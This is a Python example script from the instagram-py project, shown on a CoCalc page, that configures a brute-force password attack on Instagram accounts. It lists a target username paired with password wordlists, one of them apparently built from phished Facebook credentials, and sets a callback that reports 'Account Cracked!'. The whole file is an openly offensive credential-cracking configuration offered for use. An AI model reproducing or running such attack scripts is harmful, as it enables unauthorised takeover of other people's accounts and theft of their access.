Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
deathsec
GitHub Repository: deathsec/instagram-py
Path: blob/master/examples/multi_attack.py
197 views
1
#!/usr/bin/instagram-py -s
2
# Only Supports Python 3
3
4
import os
5
6
def hacked_an_account(username , password):
7
# Use Twilio API to Make a Message to our phone MayBe?
8
print("Account Cracked!")
9
return True
10
11
12
print("Initiating Multi Username Attack Script...")
13
14
global_callback = hacked_an_account
15
global_password_list = "{}/Developer/.exploits/facebook-phished.txt".format(os.path.expanduser('~'))
16
17
usernames = [ # Reserved Variable
18
{
19
"id" : "instatestgod__",
20
"password_list" : "/home/antonyjr/Developer/.exploits/rockyou.txt" , # full path
21
"countinue" : True, # Optional
22
"verbose" : 0 # Optional
23
},
24
# If you want to simultaniously attack the same account with different wordlist
25
# Apparently Saving does not work here if two wordlist are used on a single user!
26
# could be later fixed anyways...
27
{
28
"id" : "instatestgod__",
29
# global password list will cover us if password list is not mentioned!
30
"countinue" : False, # Optional
31
"verbose" : 3 # Optional
32
}
33
# ,
34
# {
35
# "id" : "even_more_users",
36
# "password_list" : "different_passwords.lst",
37
# }
38
]
39
# Attack Automatically starts here!
40
41